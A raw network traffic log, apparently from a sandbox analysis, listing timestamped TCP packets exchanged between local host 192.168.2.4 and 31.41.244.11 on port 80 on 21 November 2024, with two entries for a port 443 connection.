                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.830101967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.831027031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.831082106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.831157923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.831211090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.832149029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.832205057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.832298994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.832346916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.833244085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.833333015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.833342075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.833390951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.834412098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.834476948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.834561110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.834609032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.835445881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.835515976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.835553885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.835599899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.836508036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.836566925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.836632013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.836684942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.837598085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.837658882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.837704897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.837749958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.838675976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.838740110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.838794947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.838844061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.839768887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.839823961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.839879990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.839929104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.840843916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.840903044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.840959072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.841008902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.841969013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.842021942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.842067957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.842118025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.843050957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.843108892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.843162060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.843214989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.844108105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.844155073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.844296932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.844297886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.845262051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.845289946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.845319986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.845344067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.846354008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.846407890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.846457005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.846579075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.847637892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.847661972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.847700119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.847728014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.848496914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.848556995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.848586082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.848638058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.913660049 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.913692951 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003051996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003104925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003177881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003223896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003474951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003511906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003541946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.003563881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.004556894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.004591942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.004616976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.004642010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.005518913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.005574942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.005604029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.005660057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.006618023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.006696939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.006728888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.006784916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.007675886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.007754087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.007797956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.007858992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.008780956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.008835077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.008846045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.008893967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.009886026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.009943962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.010003090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.010054111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.010951042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.011009932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.011077881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.011133909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.012048006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.012106895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.012132883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.012191057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.013132095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.013194084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.013241053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.013299942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.014266968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.014328003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.014374018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.014425993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.015307903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.015369892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.015436888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.015491009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.016379118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.016433001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.016443968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.016499043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.017501116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.017559052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.017631054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.017688036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.018556118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.018615007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.018683910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.018740892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.019690037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.019747972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.019812107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.019870043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.020756006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.020817041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.020872116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.020926952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.021823883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.021883011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.021949053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.022006989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.022937059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.023016930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.023051977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.023111105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.024036884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.024101019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.024157047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.024214029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.025129080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.025188923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.025404930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.025460958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.026237011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.026295900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.026345968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.026403904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.027303934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.027373075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.027436972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.027494907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.028388977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.028446913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.028497934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.028553009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.029490948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.029556036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.029638052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.029700994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.030555010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.030611038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.030618906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.030668974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.031651020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.031713963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.031754971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.031805992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.032759905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.032814980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.032855988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.032911062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.033838034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.033901930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.033932924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.033987999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.034960032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.035017967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.035080910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.035131931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.036015987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.036072969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.036139011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.036199093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.037091970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.037153006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.037211895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.037272930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.038240910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.038296938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.038316011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.038383961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.039273977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.039386988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.039427996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.039494038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.040374041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.040437937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.040445089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.040501118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.041456938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.041517973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.041599989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.041657925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.042558908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.042613983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.042623997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.042670012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.043649912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.043710947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.043781996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.043845892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.044744968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.044805050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.044847965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.044918060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.045806885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.045870066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.045954943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.046010017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.046960115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.047020912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.047054052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.047147989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.048015118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.048079014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.048129082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.048192024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.049117088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.049182892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.049279928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.049341917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.050158024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.050221920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.050288916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.050365925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.051245928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.051301956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.051389933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.051449060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.052352905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.052414894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.052481890 CET804977031.41.244.11192.168.2.4
